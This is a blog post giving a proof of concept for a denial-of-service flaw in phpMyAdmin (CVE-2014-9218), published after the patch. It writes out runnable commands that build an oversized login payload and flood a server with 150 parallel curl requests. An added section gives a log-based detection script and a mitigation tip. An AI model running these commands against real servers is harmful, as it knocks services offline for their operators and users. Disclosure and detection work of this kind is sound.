Thursday, December 11, 2014

CVE-2014-9218 phpMyAdmin DoS Proof of Concept

Now that enough time has passed since phpMyAdmin released the security update, we want to share our research. As you already know, we believe in Responsible Disclosure, which is why we didn't publish this post earlier.

You can read the vulnerability details in the previous blog post. In this one, we show how to exploit it.

1 - Create the payload.

$ echo -n "pma_username=xxxxxxxx&pma_password=" > payload && printf "%s" {1..1000000} >> payload

2 - Perform the Denial of Service attack.

$ for i in `seq 1 150`; do (curl --data @payload http://your-webserver-installation/phpmyadmin/ --silent > /dev/null &) done
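
The two steps above leave a recognisable trace: many POSTs to the phpMyAdmin login page from one client, each with a multi-megabyte body. The following detection sketch is an added example, not part of the original post. It assumes a simplified log format of `client_ip method path request_body_bytes` (for instance, built from a web server log that records bytes received); the function names, thresholds and sample lines are all constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: flag clients sending repeated oversized POSTs to phpMyAdmin.
# Assumed (constructed) log format, one request per line:
#   client_ip method path request_body_bytes

MIN_BODY_BYTES=1000000   # assumption: a normal login POST is far below 1 MB
MIN_REQUESTS=3           # assumption: oversized POSTs per client before flagging

flag_oversized_logins() {
  # Reads log lines on stdin and prints "ip count" for every client that
  # sent at least MIN_REQUESTS oversized POSTs to a /phpmyadmin/ path.
  awk -v min_bytes="$MIN_BODY_BYTES" -v min_req="$MIN_REQUESTS" '
    $2 == "POST" && tolower($3) ~ /^\/phpmyadmin\// && $4 + 0 >= min_bytes {
      hits[$1]++
    }
    END {
      for (ip in hits)
        if (hits[ip] >= min_req)
          print ip, hits[ip]
    }
  ' | sort
}

sample_log() {
  # Constructed sample data. 5888931 is the byte size of the payload file
  # produced in step 1; the addresses are documentation ranges.
  cat <<'EOF'
198.51.100.7 POST /phpmyadmin/ 5888931
203.0.113.20 POST /phpmyadmin/index.php 52
198.51.100.7 POST /phpmyadmin/ 5888931
203.0.113.20 GET /phpmyadmin/ 0
198.51.100.7 POST /phpmyadmin/ 5888931
203.0.113.9 POST /phpmyadmin/ 2400000
198.51.100.7 POST /phpmyadmin/ 5888931
EOF
}

# Run the check over the constructed sample.
sample_log | flag_oversized_logins
```

The same size threshold can be enforced before the request reaches PHP by capping the request body accepted for the phpMyAdmin path at the web server or reverse proxy.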

